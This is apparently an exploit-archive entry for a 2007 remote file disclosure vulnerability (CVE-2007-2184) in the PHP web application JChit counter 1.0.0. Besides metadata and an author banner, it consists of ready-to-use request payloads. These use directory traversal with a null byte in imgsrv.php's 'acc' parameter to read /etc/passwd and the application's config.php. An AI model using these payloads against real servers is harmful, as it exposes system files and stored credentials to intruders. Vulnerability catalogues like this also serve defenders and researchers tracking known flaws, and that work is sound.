JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-04-21
date_updated:
verified: 1
codes: OSVDB-38856;CVE-2007-2184
tags:
aliases:
screenshot_url:
application_url:
Y! Underground Group
http://2600.ir
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
Portal.......: jchit counter v1.0.0
Download.....: http://developers.jccorp.net
Type.........: Remote File Disclosure Vulnerability
Author.......: Dj7xpl / dj7xpl@2600.ir
HomePage.....: http://Dj7xpl.2600.ir
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
Bug..........:
imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2007-04-22]